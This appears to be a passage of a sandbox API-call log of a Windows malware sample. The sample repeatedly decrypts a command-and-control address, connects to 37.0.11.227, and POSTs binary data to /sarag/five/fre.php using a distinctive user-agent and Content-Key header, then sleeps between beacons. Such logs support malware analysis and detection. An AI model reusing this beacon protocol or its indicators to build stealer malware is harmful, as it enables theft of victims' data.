(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.755] GetProcessHeap () returned 0x690000 [0182.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0182.755] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.755] GetProcessHeap () returned 0x690000 [0182.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0182.756] GetProcessHeap () returned 0x690000 [0182.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.756] GetProcessHeap () returned 0x690000 [0182.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0182.757] GetProcessHeap () returned 0x690000 [0182.757] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0182.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.757] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0182.772] GetProcessHeap () returned 0x690000 [0182.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0182.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.773] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.776] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.777] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.777] GetProcessHeap () returned 0x690000 [0182.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0182.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.780] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0182.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.783] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.786] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0182.786] GetProcessHeap () returned 0x690000 [0182.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0182.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.788] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0182.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.790] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0182.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.792] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0182.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.793] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0182.793] GetProcessHeap () returned 0x690000 [0182.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0182.793] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6af6f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0182.793] GetProcessHeap () returned 0x690000 [0182.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0182.793] socket (af=2, type=1, protocol=6) returned 0x2fc [0182.793] connect (s=0x2fc, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0182.818] FreeAddrInfoW (pAddrInfo=0x6af6f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0182.818] GetProcessHeap () returned 0x690000 [0182.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0182.818] GetProcessHeap () returned 0x690000 [0182.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0182.818] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.819] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.819] GetProcessHeap () returned 0x690000 [0182.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a9778 [0182.819] GetProcessHeap () returned 0x690000 [0182.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.820] GetProcessHeap () returned 0x690000 [0182.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0182.820] GetProcessHeap () returned 0x690000 [0182.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0182.820] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.821] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.821] GetProcessHeap () returned 0x690000 [0182.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0182.821] GetProcessHeap () returned 0x690000 [0182.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.821] send (s=0x2fc, buf=0x6abd08*, len=242, flags=0) returned 242 [0182.822] send (s=0x2fc, buf=0x6aba40*, len=159, flags=0) returned 159 [0182.822] GetProcessHeap () returned 0x690000 [0182.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0182.822] recv (in: s=0x2fc, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0182.897] GetProcessHeap () returned 0x690000 [0182.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0182.898] GetProcessHeap () returned 0x690000 [0182.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0182.899] GetProcessHeap () returned 0x690000 [0182.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9778 | out: hHeap=0x690000) returned 1 [0182.904] GetProcessHeap () returned 0x690000 [0182.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0182.905] closesocket (s=0x2fc) returned 0 [0182.905] GetProcessHeap () returned 0x690000 [0182.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0182.905] GetProcessHeap () returned 0x690000 [0182.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.906] GetProcessHeap () returned 0x690000 [0182.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0182.906] GetProcessHeap () returned 0x690000 [0182.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0182.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe40) returned 0x2fc [0182.908] Sleep (dwMilliseconds=0xea60) [0182.910] GetProcessHeap () returned 0x690000 [0182.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0182.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.911] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.915] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0182.922] GetProcessHeap () returned 0x690000 [0182.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0182.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.923] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.924] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.925] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.925] GetProcessHeap () returned 0x690000 [0182.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0182.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.926] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0182.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.927] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.928] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0182.928] GetProcessHeap () returned 0x690000 [0182.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0182.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.928] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.929] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.930] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.931] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.931] GetProcessHeap () returned 0x690000 [0182.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0182.931] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.931] GetProcessHeap () returned 0x690000 [0182.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0182.931] GetProcessHeap () returned 0x690000 [0182.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0182.932] GetProcessHeap () returned 0x690000 [0182.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0182.933] GetProcessHeap () returned 0x690000 [0182.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0182.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.934] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.938] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0182.943] GetProcessHeap () returned 0x690000 [0182.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0182.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.944] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.945] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.946] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.946] GetProcessHeap () returned 0x690000 [0182.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0182.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.947] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0182.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.948] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.949] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0182.949] GetProcessHeap () returned 0x690000 [0182.949] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0182.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.950] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0182.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.951] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0182.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.952] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0182.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.953] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0182.953] GetProcessHeap () returned 0x690000 [0182.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0182.953] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9b68*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea78*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0182.953] GetProcessHeap () returned 0x690000 [0182.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0182.953] socket (af=2, type=1, protocol=6) returned 0x300 [0182.953] connect (s=0x300, name=0x6aea78*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0182.984] FreeAddrInfoW (pAddrInfo=0x6a9b68*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea78*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0182.984] GetProcessHeap () returned 0x690000 [0182.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0182.984] GetProcessHeap () returned 0x690000 [0182.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0182.985] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.985] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.985] GetProcessHeap () returned 0x690000 [0182.986] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0182.986] GetProcessHeap () returned 0x690000 [0182.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.987] GetProcessHeap () returned 0x690000 [0182.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0182.987] GetProcessHeap () returned 0x690000 [0182.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0182.988] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.988] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.988] GetProcessHeap () returned 0x690000 [0182.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0182.988] GetProcessHeap () returned 0x690000 [0182.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.989] send (s=0x300, buf=0x6a91a8*, len=242, flags=0) returned 242 [0182.990] send (s=0x300, buf=0x6aba40*, len=159, flags=0) returned 159 [0182.990] GetProcessHeap () returned 0x690000 [0182.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0182.990] recv (in: s=0x300, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0183.068] GetProcessHeap () returned 0x690000 [0183.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0183.068] GetProcessHeap () returned 0x690000 [0183.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0183.069] GetProcessHeap () returned 0x690000 [0183.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0183.069] GetProcessHeap () returned 0x690000 [0183.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0183.070] closesocket (s=0x300) returned 0 [0183.071] GetProcessHeap () returned 0x690000 [0183.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0183.071] GetProcessHeap () returned 0x690000 [0183.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0183.071] GetProcessHeap () returned 0x690000 [0183.072] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0183.072] GetProcessHeap () returned 0x690000 [0183.072] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0183.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd90) returned 0x300 [0183.074] Sleep (dwMilliseconds=0xea60) [0183.076] GetProcessHeap () returned 0x690000 [0183.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0183.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.077] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0183.094] GetProcessHeap () returned 0x690000 [0183.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0183.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.095] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0183.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.096] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.098] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.098] GetProcessHeap () returned 0x690000 [0183.099] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0183.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.100] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0183.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.101] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0183.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.107] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0183.107] GetProcessHeap () returned 0x690000 [0183.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0183.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.108] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.109] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.111] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.112] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.112] GetProcessHeap () returned 0x690000 [0183.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0183.112] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.112] GetProcessHeap () returned 0x690000 [0183.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0183.113] GetProcessHeap () returned 0x690000 [0183.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0183.113] GetProcessHeap () returned 0x690000 [0183.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0183.113] GetProcessHeap () returned 0x690000 